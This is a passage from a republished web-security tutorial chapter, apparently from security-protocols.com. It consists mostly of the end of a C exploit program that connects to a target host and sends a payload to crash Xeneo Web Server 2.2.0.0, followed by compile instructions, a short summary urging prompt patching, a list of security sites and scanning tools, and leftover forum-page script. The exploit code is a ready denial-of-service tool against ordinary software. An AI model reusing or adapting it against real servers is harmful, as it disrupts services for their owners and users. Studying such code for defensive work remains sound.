        printf("Xeneo Web Server 2.2.0.0 DoS\r\n<tommy@security-protocols.com>\r\n\r\n");
        printf("Tool usage:\r\n%s <targetip> [targetport] (default is 80)\r\n\r\n", argv[0]);
        printf("www.security-protocols.com\r\n\r\n");
        exit(1);
    }

    wVersionRequested = MAKEWORD(1, 1);
    if (WSAStartup(wVersionRequested, &wsaData) < 0) return -1;

    target = argv[1];

    // for default web attacks
    port = 80;

    if (argc >= 3) port = atoi(argv[2]);
    bufsize = 512;
    if (argc >= 4) bufsize = atoi(argv[3]);

    mysocket = socket(AF_INET, SOCK_STREAM, 0);
    if (mysocket == INVALID_SOCKET)
    {
        printf("Socket error!\r\n");
        exit(1);
    }

    printf("Resolving hostnames...\n");
    if ((pTarget = gethostbyname(target)) == NULL)
    {
        printf("Resolve of %s failed\n", argv[1]);
        exit(1);
    }

    memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
    sock.sin_family = AF_INET;
    sock.sin_port = htons((USHORT)port);

    printf("Connecting...\n");
    if ((connect(mysocket, (struct sockaddr *)&sock, sizeof(sock))))
    {
        printf("Couldn't connect to host.\n");
        exit(1);
    }

    printf("Sending payload...\n");
    if (send(mysocket, exploit, sizeof(exploit) - 1, 0) == -1)
    {
        printf("Error sending the exploit payload\r\n");
        closesocket(mysocket);
        exit(1);
    }

    printf("Remote webserver has been DoS'ed\r\n");
    closesocket(mysocket);
    WSACleanup();
    return 0;
}

You can compile this exploit with Microsoft Visual Studio 6.0.

Summary

In this chapter we have learned a lot about scanning for and finding vulnerabilities, and about ways of discovering weaknesses in web servers.
This is very important: apply vendors' security patches promptly, turn off unneeded features on the web server, and regularly scan your own network for vulnerabilities.

Bibliography

Security URLs

http://security-protocols.com
http://eeye.com
http://packetstormsecurity.nl
http://astalavista.com

Scanning tools

Nikto: http://www.cirt.net/code/nikto.shtml
Whisker: http://www.wiretrip.net/rfp/
Shadow Security Scanner: http://www.safety-lab.com

Fuzzing tools

SPIKE: http://www.immunitysec.com/spike.html

badpack3t
badpack3t@security-protocols.com
www.security-protocols.com

Copyright © 2000-2003 Security-Protocols Inc. All trademarks are property of their respective owners. For entertainment purposes only.

When reposting, please cite the original address: https://www.9cbs.com/read-86016.html
src="view/js/bootstrap.min.js?2.2.0"></script><script src="view/js/xiuno.js?2.2.0"></script><script src="view/js/bootstrap-plugin.js?2.2.0"></script><script src="view/js/async.min.js?2.2.0"></script><script src="view/js/form.js?2.2.0"></script><script> var debug = DEBUG = 0; var url_rewrite_on = 1; var url_path = './'; var forumarr = {"1":"Tech"}; var fid = 1; var uid = 0; var gid = 0; xn.options.water_image_url = 'view/img/water-small.png'; </script><script src="view/js/wellcms.js?2.2.0"></script><a class="scroll-to-top rounded" href="javascript:void(0);"><i class="icon-angle-up"></i></a><a class="scroll-to-bottom rounded" href="javascript:void(0);" style="display: inline;"><i class="icon-angle-down"></i></a></body></html><script> var forum_url = 'list-1.html'; var safe_token = 'uW4ghIfk1mrPdWpxW_2BcQvhSk_2FhKJBlxFo9uzsP8AhV_2FWZd37aIxYWRWPkIx3AhKJ0Fh4d7o_2BMo_2BF60X1uB_2FmWQ_3D_3D'; var body = $('body'); body.on('submit', '#form', function() { var jthis = $(this); var jsubmit = jthis.find('#submit'); jthis.reset(); jsubmit.button('loading'); var postdata = jthis.serializeObject(); $.xpost(jthis.attr('action'), postdata, function(code, message) { if(code == 0) { location.reload(); } else { $.alert(message); jsubmit.button('reset'); } }); return false; }); function resize_image() { var jmessagelist = $('div.message'); var first_width = jmessagelist.width(); jmessagelist.each(function() { var jdiv = $(this); var maxwidth = jdiv.attr('isfirst') ? 
first_width : jdiv.width(); var jmessage_width = Math.min(jdiv.width(), maxwidth); jdiv.find('img, embed, iframe, video').each(function() { var jimg = $(this); var img_width = this.org_width; var img_height = this.org_height; if(!img_width) { var img_width = jimg.attr('width'); var img_height = jimg.attr('height'); this.org_width = img_width; this.org_height = img_height; } if(img_width > jmessage_width) { if(this.tagName == 'IMG') { jimg.width(jmessage_width); jimg.css('height', 'auto'); jimg.css('cursor', 'pointer'); jimg.on('click', function() { }); } else { jimg.width(jmessage_width); var height = (img_height / img_width) * jimg.width(); jimg.height(height); } } }); }); } function resize_table() { $('div.message').each(function() { var jdiv = $(this); jdiv.find('table').addClass('table').wrap('<div class="table-responsive"></div>'); }); } $(function() { resize_image(); resize_table(); $(window).on('resize', resize_image); }); var jmessage = $('#message'); jmessage.on('focus', function() {if(jmessage.t) { clearTimeout(jmessage.t); jmessage.t = null; } jmessage.css('height', '6rem'); }); jmessage.on('blur', function() {jmessage.t = setTimeout(function() { jmessage.css('height', '2.5rem');}, 1000); }); $('#nav li[data-active="fid-1"]').addClass('active'); </script>
